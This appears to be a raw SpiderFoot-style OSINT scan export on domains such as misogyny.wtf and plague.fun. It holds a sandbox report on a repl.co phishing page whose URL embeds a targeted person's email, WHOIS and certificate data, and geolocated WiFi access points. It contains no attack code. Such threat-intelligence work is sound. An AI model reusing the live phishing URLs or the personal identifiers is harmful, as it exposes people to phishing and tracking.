plague.fun 2022-12-18 00:05:42 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://lightsalmonstickyopenlook.eberech.repl.co/#kazuharu.fujimori%40aviationweek.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', 
u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_df0_IESQMMUTEX_0_303"\n "IsoScope_df0_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3568"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_df0_IE_EarlyTabStart_0xc5c_Mutex"\n "IsoScope_df0_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_df0_ConnHashTable<3568>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_df0_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"code.jquery.com"\n "lightsalmonstickyopenlook.eberech.repl.co"\n "maxcdn.bootstrapcdn.com"\n "stackpath.bootstrapcdn.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "104.18.10.207:443"\n "142.251.211.234:443"\n "104.17.25.14:443"\n "69.16.175.42:443"\n 
"104.18.11.207:443"\n "104.16.85.20:443"\n "142.250.217.74:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarA75.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarA74.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabA62.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabA73.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "ZDT1I5CP.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZDT1I5CP.txt]- [targetUID: 00000000-00003568]\n Dropped file: "KW7GCVVC.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KW7GCVVC.txt]- [targetUID: 00000000-00003568]\n 
Dropped file: "7BFR5W0J.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7BFR5W0J.txt]- [targetUID: 00000000-00001336]\n Dropped file: "BWKPCNHC.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BWKPCNHC.txt]- [targetUID: 00000000-00001336]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpslightsalmonstickyopenlook.eberech.repl.co#kazuharu.fujimori%40aviationweek.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "bootstrap.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "TarA75.tmp" has type "data"- Location: [%TEMP%\\TarA75.tmp]- [targetUID: 00000000-00001336]\n "jquery.session.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ZDT1I5CP.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZDT1I5CP.txt]- [targetUID: 00000000-00003568]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00001336]\n "jquery-3.2.1.slim.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "CabA62.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabA62.tmp]- [targetUID: 00000000-00001336]\n "jquery.min_3_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "KW7GCVVC.txt" has type "ASCII text"- 
Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KW7GCVVC.txt]- [targetUID: 00000000-00003568]\n "~DF1B56E154B17285C0.TMP" has type "data"- Location: [%TEMP%\\~DF1B56E154B17285C0.TMP]- [targetUID: 00000000-00003568]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "CabA73.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabA73.tmp]- [targetUID: 00000000-00001336]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00001336]\n "TarA74.tmp" has type "data"- Location: [%TEMP%\\TarA74.tmp]- [targetUID: 00000000-00001336]\n "7BFR5W0J.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7BFR5W0J.txt]- [targetUID: 00000000-00001336]\n "css_4_.css" has type "ASCII text"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://lightsalmonstickyopenlook.eberech.repl.co/#kazuharu.fujimori%40aviationweek.com"\n Pattern match: "https://lightsalmonstickyopenlook.eberech.repl.co"\n Heuristic match: "code.jquery.com"\n Heuristic match: "lightsalmonstickyopenlook.eberech.repl.co"\n Heuristic match: "maxcdn.bootstrapcdn.com"\n Heuristic match: "stackpath.bootstrapcdn.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 
1, u'type': 12, u'description': u'7/91 Antivirus vendors marked sample as malicious (7% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-6', u'name': u'Found an IP/URL artifact that was identified as malicious by at least three reputation engines', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 12, u'description': u'8/91 reputation engines marked "http://lightsalmonstickyopenlook.eberech.repl.co" as malicious (8% detection rate)\n 7/91 reputation engines marked "https://lightsalmonstickyopenlook.eberech.repl.co/" as malicious (7% detection rate)\n 7/91 reputation engines marked "https://lightsalmonstickyopenlook.eberech.repl.co" as malicious (7% detection rate)'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-11', u'name': u'The analysis extracted a file that was identified as malicious', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 8, u'description': u'27/60 Antivirus vendors marked dropped file "urlref_httpslightsalmonstickyopenlook.eberech.repl.co#kazuharu.fujimori%40aviationweek.com" as malicious (classified as "JS.Heur.Phishing.7.CD3625D9" with 45% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'6396afc57936a656c93b1410', u'target_url': None, u'interesting': 34.149.204.188 2022-12-18 00:21:06 Open TCP Port No Censys 0 0 2 0 None 172.67.147.230:8880 172.67.147.230 2022-12-18 00:21:11 WiFi 
Access Point Nearby No Wigle.net 0 0 5 0 None Dubtronicssid (Net ID: 00:01:24:F0:BB:A4) 37.780462,-122.390564 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None zoom2888 (Net ID: 00:01:38:85:BD:9E) 37.780462,-122.390564 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet4862 (Net ID: 00:01:36:5B:48:60) 37.780462,-122.390564 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SurfandSip (Net ID: 00:02:2D:03:87:91) 37.7803446,-122.3906132 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 410HowardStudios (Net ID: 00:02:2D:00:25:63) 37.7803446,-122.3906132 2022-12-18 00:24:21 Malicious Internet Name Yes MetaDefender 0 1 1 0 None avira.com [misogyny.wtf] misogyny.wtf 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77a9a3cbbc7013fb-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.7.179 2022-12-18 00:08:31 Netblock Membership No RIPE 1 0 2 0 None 104.21.0.0/20 104.21.7.179 2022-12-18 00:21:58 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: 
Accept-Encoding Server: cloudflare CF-RAY: 7795ba721cfd2a2d-ORD Content-Encoding: gzip 2a06:98c1:3120::1 2022-12-18 00:09:41 Co-Hosted Site No HackerTarget 0 0 2 0 None acnscrty.rcvry.workers.dev 172.67.147.230 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None zoom1330 (Net ID: 00:01:38:92:E5:07) 37.7803446,-122.3906132 2022-12-18 00:42:27 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.17] https://www.virustotal.com/en/ip-address/188.114.96.17/information/ 188.114.96.0/24 2022-12-18 00:04:00 Physical Location No ipstack 0 0 1 0 None Netherlands 137.117.157.128 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None validarpichincha.ecuadorr.repl.co 34.149.204.188 2022-12-18 00:25:33 Affiliate - Domain Name No DNS Resolver 0 0 3 0 None securemail.pro webmail-fr.securemail.pro 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 2WIRE522 (Net ID: 00:01:E6:93:CB:2D) 37.780462,-122.390564 2022-12-18 00:06:06 Similar Domain Yes Tool - DNSTwist 1 0 1 0 None ras.putain.fr rasputain.fr 2022-12-18 00:02:45 Raw Data from RIRs No CertSpotter 1 0 1 0 None [{u'pubkey_sha256': u'432961d5f32390043415639e54b3b0f65069a835707a1a3b93e937e211e4a25d', u'revoked': False, u'not_after': u'2022-12-19T20:09:19Z', u'id': u'4202706731', u'cert': {u'data': u'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', u'sha256': u'81c617224289d583511688ac79d71981676bc4671feb811a1401928a0e1512e2', u'type': u'cert'}, u'dns_names': [u'*.misogyny.wtf', u'misogyny.wtf'], u'tbs_sha256': u'8865b84af0efe8cd871b014a584c4494dee4348ccc8ca88bfe8e609be6531efc', u'not_before': u'2022-09-20T20:09:20Z', u'issuer': {u'pubkey_sha256': u'276fe8a8c4ec7611565bf9fce6dcace9be320c1b5bea27596b2204071ed04f10', u'name': u"C=US, O=Let's Encrypt, CN=E1"}}, {u'pubkey_sha256': u'1359a60d8dec09683a030b41be6af0751cc8495b7e6a5eed543f3e67ea3c3e34', u'revoked': False, u'not_after': u'2022-12-19T21:18:05Z', u'id': u'4202806186', u'cert': {u'data': 
u'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', u'sha256': u'966c4fc32756a6311ee52ac60b7e048a878007f9ee4f33ec45eb1f0391fa782f', u'type': u'precert'}, u'dns_names': [u'*.misogyny.wtf', u'misogyny.wtf'], u'tbs_sha256': u'fcaf693f5698707480c4defadce4170256c884fd95210accf96732b46604fa80', u'not_before': u'2022-09-20T21:18:06Z', u'issuer': {u'pubkey_sha256': u'f3559fd766dc2e51474007c996ec67cd9e85ae0fa827d3d663f5abc2eafcbe24', u'name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5'}}] misogyny.wtf 2022-12-18 00:08:22 Netblock Membership No RIPE 105 0 2 0 None 188.114.96.0/24 188.114.96.0 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None YouTube User (Category: video) https://www.youtube.com/user/rasputain/about rasputain 2022-12-18 00:20:59 Netblock IPv6 Membership No Censys 0 0 2 0 None 2606:4700:3033::/48 2606:4700:3033::6815:1cf0 2022-12-18 00:02:39 Internet Name No SpiderFoot UI 74 0 0 0 None misogyny.wtf plague.fun,misogyny.wtf,rasputain.fr,zerotwo-best-waifu.online,137.117.157.128,20.195.209.219,4.228.83.86,40.113.112.131,51.103.210.236,20.224.2.213 2022-12-18 00:41:06 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.12] https://www.virustotal.com/en/ip-address/188.114.96.12/information/ 188.114.96.0/24 2022-12-18 00:03:10 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:d8:1f:4b:91:5b:d7:bf:2f:be:6e:27:8c:6c:60:f6:86:80 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: May 6 17:46:04 2022 GMT Not After : Aug 4 17:46:03 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:e7:c5:36:be:0c:28:37:d1:29:a1:d8:b4:65:57: 4a:67:4b:70:6f:de:ee:84:da:2e:65:a4:e6:b3:94: fc:d9:d6:02:89:2f:df:90:93:c2:8f:aa:c6:52:e4: e9:73:db:4f:c5:3b:ef:34:a6:e0:3b:5d:da:48:b4: 48:c5:11:62:d2 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 
extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: B1:C6:F3:C6:E5:48:6A:06:D6:8D:F2:AC:17:DA:BF:36:3F:CE:47:47 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : May 6 18:46:04.131 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:4B:23:C5:C7:DA:43:E1:C7:33:EC:22:06: 46:DB:FD:FD:6E:26:73:6A:42:93:5E:C8:48:8D:94:08: 6A:63:AE:77:02:21:00:D6:CF:1B:D9:F4:BE:72:8F:70: 75:12:34:0F:98:8E:AA:B3:70:0F:52:86:45:C8:38:29: 92:51:17:15:B4:60:9D Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : May 6 18:46:04.115 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:5F:DD:20:15:61:43:DF:28:01:F1:5E:3A: C3:BF:CE:49:95:FF:9D:AE:08:6F:25:34:45:2D:16:74: 18:DC:13:62:02:20:34:0B:4C:12:AB:EC:60:49:0F:FF: 04:29:D3:45:68:78:3C:53:F7:3B:DB:3A:7A:B9:46:20: D8:BF:54:89:19:52 Signature Algorithm: ecdsa-with-SHA384 30:65:02:31:00:8e:55:f4:4b:0b:ea:74:eb:af:1b:31:ca:b4: 2a:f1:bc:38:eb:cd:b1:48:26:0d:4a:05:25:d6:55:33:8b:2c: 28:82:d7:7f:f8:62:b8:02:0b:3d:6c:71:af:b2:08:1b:b2:02: 30:75:2c:e8:ea:b0:91:09:c9:a7:bb:57:4c:be:70:65:3b:e4: 37:15:35:ef:f2:2c:d0:1d:71:bf:99:f3:16:f5:53:23:cc:07: 1a:c8:33:71:82:63:73:c3:18:2c:1b:ac:94 2022-12-18 00:12:19 Phone Number No Phone 
Number Extractor 3 0 2 0 None +19854014545 Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. 
Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. 
Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp
2022-12-18 00:22:14 Open TCP Port No Censys 0 0 2 0 None 172.67.169.215:8443 172.67.169.215
2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None 0b21a147-2b2b-4fde-92c4-f3d74ff2845b.id.repl.co 34.149.204.188
2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77b2bfcd29419a0b-FRA"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.96.1
2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None House (Net ID: 00:02:2D:09:FC:0D) 37.7803446,-122.3906132
2022-12-18 00:07:25 SSL Certificate - Raw Data No Certificate Transparency 0 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 0f:0e:0e:28:f1:c6:cb:2f:ce:67:1d:a6:c8:b8:7a:b2 Signature Algorithm: ecdsa-with-SHA256 Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 Validity Not Before: Jan 17 00:00:00 2022 GMT Not After : Jan 17 23:59:59 2023 GMT Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:ba:07:4b:f6:cd:75:2e:c1:25:8d:34:ab:3e:b4: aa:17:69:09:33:64:8d:12:4c:78:e7:a9:12:25:17: 21:a5:8d:70:39:49:dd:46:db:8d:c9:8d:58:c6:8b: dc:76:18:a8:1e:77:71:72:01:4a:e8:e3:da:d8:35: 79:51:6a:a1:4f ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Authority Key Identifier: keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F X509v3 Subject Key Identifier: 02:2A:86:DC:E3:73:06:B6:9C:5B:CA:6F:78:47:D8:90:1D:C4:4C:66 X509v3 Subject Alternative Name: DNS:rasputain.fr, DNS:*.rasputain.fr, DNS:sni.cloudflaressl.com X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: Full Name: URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl Full Name: URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl X509v3 Certificate Policies: Policy: 2.23.140.1.2.2 CPS: http://www.digicert.com/CPS Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt X509v3 Basic Constraints: critical CA:FALSE CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA256 30:45:02:20:6f:73:02:9b:eb:82:c0:18:89:d7:54:b9:e8:bf: f7:f2:1a:58:cf:21:10:20:9e:f3:e5:90:50:67:fa:98:63:5a: 02:21:00:90:dd:98:e7:fb:4d:8d:1d:3e:1c:97:37:b2:0c:3e: 